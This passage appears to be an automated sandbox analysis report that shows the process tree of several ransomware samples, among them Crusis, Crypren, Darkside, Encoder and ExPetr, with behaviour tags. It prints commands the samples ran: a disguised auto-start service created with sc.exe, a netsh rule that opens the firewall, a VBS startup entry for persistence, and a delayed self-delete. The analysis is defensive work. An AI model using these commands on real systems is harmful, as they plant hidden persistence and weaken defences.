C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exeHEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exeHEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4956
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exe3⤵
- Executes dropped EXE
PID:4964
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exeHEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ywwikdvr\4⤵
- System Location Discovery: System Language Discovery
PID:5412
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hjcnucqg.exe" C:\Windows\SysWOW64\ywwikdvr\4⤵
- System Location Discovery: System Language Discovery
PID:5520
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ywwikdvr binPath= "C:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exe /d\"C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe\"" type= own start= auto DisplayName= "wifi support"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5664
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ywwikdvr "wifi internet conection"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5800
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ywwikdvr4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5156
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 7004⤵
- Program crash
PID:8140
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exeHEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5320
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe3⤵
- Drops startup file
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5648 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe"4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3232 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7276
-
-
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeHEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"4⤵
- System Location Discovery: System Language Discovery
PID:5808
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6748
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6760
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6772
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6796
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6864
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6912
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6124
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6112
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6104
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6100
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6080
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6068
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6060
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6052
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5956
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5948
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6136
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5124
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:3180
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5132
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:1196
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6488
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5380
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5644
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5628
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6164
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6180
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5588
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5560
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6304
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6148
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5636
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5384
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6160
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5596
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5580
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6432
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:5932
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵
- Executes dropped EXE
PID:6172
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5424
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5836
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:2920
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5776
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5220
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5300
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4060
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:4840
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6272
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6264
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5352
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6252
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6244
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6504
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6544
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5356
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:6216
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5420
-
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exeC:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe4⤵PID:5216
-
-
